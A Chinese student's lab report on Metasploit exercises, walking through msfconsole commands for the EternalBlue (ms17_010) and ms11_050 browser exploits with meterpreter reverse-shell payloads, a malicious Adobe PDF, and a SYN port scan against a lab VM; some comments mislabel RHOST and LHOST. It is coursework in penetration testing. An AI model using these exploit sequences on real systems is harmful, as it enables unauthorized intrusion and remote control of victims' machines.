实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
基础知识问答
用自己的话解释什么是exploit,payload,encode.
用自己感觉通俗的话来说:
exploit:渗透攻击,利用发现的漏洞对靶机进行攻击。
payload:攻击载荷,渗透攻击成功后在系统中运行的模块,即通过渗透攻击把攻击载荷运至靶机中。
Ecode:编码器,对代码进行异或、祛除坏字符及其他编码,保护攻击载荷不被发现。
实践过程
主动攻击实践
ms17_010
攻击机 靶机ping通
输入msfconsole指令,打开控制台
use exploit/windows/smb/ms17_010_eternalblue //使用漏洞
set payload windows/x64/meterpreter/reverse_tcp //选择攻击载荷
set RHOST //设置攻击方ip
set LHOST //设置靶机ip
exploit
针对浏览器的攻击
ms11_050
输入msfconsole指令,打开控制台
msf > use windows/browser/ms11_050_mshtml_cobjectelement //使用浏览器ms11_050漏洞
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //使用http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST //攻击方ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5219 //攻击方攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5219wyb //统一资源标识符路径设置
show options
exploit攻击以后,将生成的网址在靶机中打开,网页打开失败,浏览器停止工作,攻击失败
针对客户端的攻击
Adobe
输入msfconsole指令,打开控制台
use windows/fileformat/adobe_cooltype_sing //选择攻击模块
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
set LHOST //攻击方IP
set LPORT 5219 //攻击方攻击端口
set FILENAME 20165219exp5.pdf //生成的文件名
得到文件路径
找到文件并复制到靶机
因为我没有装xp虚拟机,w7不能打开
成功应用任何一个辅助模块
use auxiliary/scanner/portscan/syn(使用portscan模块)
show options
set RHOST 192.168.183.129(目标)
set THREADS 50(线程)
exploit
实验中遇到的问题及解决方法
Adobe实验中 没有找到生成的pdf文件
解决: 根据生成的路径,在终端cd进入文件所在目录,再用复制命令移动到主文件夹下
没有安装xp虚拟机
解决:这次时间不太够了emmm 下次补上
离实战还缺什么步骤
多去尝试新的攻击手法,可以去找一些其他的攻击模块尝试
实验感想
学会了利用MSF进行多种方式的渗透,但是感觉自己对MSF的了解还是欠缺的,对于指令,并没有理解,只是单纯的照搬,以后还需努力